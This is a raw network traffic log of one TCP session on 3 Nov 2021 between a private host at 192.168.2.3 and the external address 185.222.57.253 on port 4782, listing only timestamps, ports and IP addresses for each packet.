Nov 3, 2021 13:24:30.762271881 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762280941 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762285948 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762290955 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762306929 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762310982 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762325048 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762342930 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762358904 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762373924 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762376070 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762379885 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762393951 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762403011 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762413025 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762430906 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762448072 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762464046 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762480974 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762485981 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762490034 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762497902 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762515068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762531996 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762547970 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762562037 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762569904 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762573957 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762579918 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762597084 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762613058 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762613058 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762633085 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762646914 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762649059 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762666941 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762684107 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762698889 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762700081 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762705088 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.762712955 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.762793064 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.888705015 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911432981 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911490917 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911530972 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911539078 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911570072 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911609888 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911614895 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911650896 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911693096 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911695957 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911734104 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911773920 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911776066 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911813974 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911855936 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911856890 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911895037 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911935091 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.911936045 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.911973953 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912014961 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912014961 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912055969 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912094116 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912132025 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912143946 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912169933 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912182093 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912223101 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912261963 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912265062 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912301064 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912342072 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912343979 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912383080 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912421942 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912446022 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912462950 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912501097 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912503004 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912539959 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912579060 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912579060 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912619114 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912658930 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912659883 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912699938 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912735939 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912736893 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912775993 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912816048 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912816048 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912879944 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912921906 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.912933111 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.912961960 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913001060 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913027048 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.913067102 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913110018 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.913110018 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913149118 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913188934 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913206100 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.913228989 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913265944 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913269997 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.913304090 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913341999 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913362026 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:30.913381100 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913413048 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:30.913448095 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.090564966 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113157988 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113198996 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113236904 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113274097 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113300085 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113311052 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113349915 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113373995 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113389015 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113425016 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113459110 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113461971 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113488913 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113502026 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113542080 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113579035 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113601923 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113615990 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113641024 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113652945 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113706112 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113739014 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113740921 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113775969 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113806963 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.113815069 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113852024 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113888979 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113926888 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113961935 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.113991976 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114020109 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114026070 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114034891 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114058018 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114093065 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114094019 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114132881 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114162922 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114168882 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114207029 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114243984 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114269018 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114279985 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114315033 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114317894 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114353895 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114391088 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114418983 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114427090 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114455938 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114466906 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114504099 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114540100 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114567041 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114577055 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114603996 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114613056 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114650965 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114687920 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114721060 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114722967 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114753008 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114763021 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114799976 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114836931 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114860058 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114872932 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114898920 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.114909887 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.114938021 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.115107059 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.251688004 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274180889 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274229050 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274260044 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274290085 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274322033 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274327993 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274353027 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274384975 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274418116 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274421930 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274450064 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274471045 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274496078 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274525881 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274527073 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274559021 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274559975 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274595022 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274626970 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274656057 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274663925 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274682999 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274688005 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274720907 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274749041 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274777889 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274804115 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274807930 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274840117 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274846077 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274872065 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274900913 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274903059 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274931908 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274955988 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274960995 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.274986982 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.274991989 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275022984 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275052071 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275053978 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275083065 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275111914 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275113106 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275144100 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275173903 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275202036 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275211096 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275237083 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275243044 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275274038 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275305033 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275332928 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275333881 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275358915 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275366068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275397062 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275420904 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275425911 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275456905 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275481939 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275485992 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275517941 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275541067 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275547981 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275578022 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275608063 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275631905 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275635958 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275660992 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.275667906 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275695086 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.275717974 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.364224911 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387073040 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387135029 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387176037 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387226105 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387279034 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387288094 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387347937 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387384892 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387411118 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387465000 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387475014 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387546062 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387587070 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387607098 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387656927 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387697935 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387737989 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387761116 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387779951 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387821913 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387864113 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387868881 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387902975 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387940884 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.387943029 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.387983084 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388021946 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388057947 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388060093 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388099909 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388099909 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388139009 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388180017 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388219118 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388220072 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388261080 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388264894 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388302088 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388339996 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388340950 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388379097 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388418913 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388458014 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388497114 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388498068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388536930 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388573885 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388576031 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388614893 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388653040 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388691902 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388730049 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388731003 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388767004 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388770103 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388812065 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388840914 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388883114 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388919115 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388958931 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.388961077 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.388998985 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.389035940 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.389038086 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.389077902 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.389079094 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.389117002 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.389153957 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.389158010 CET	4782	49741	185.222.57.253	192.168.2.3
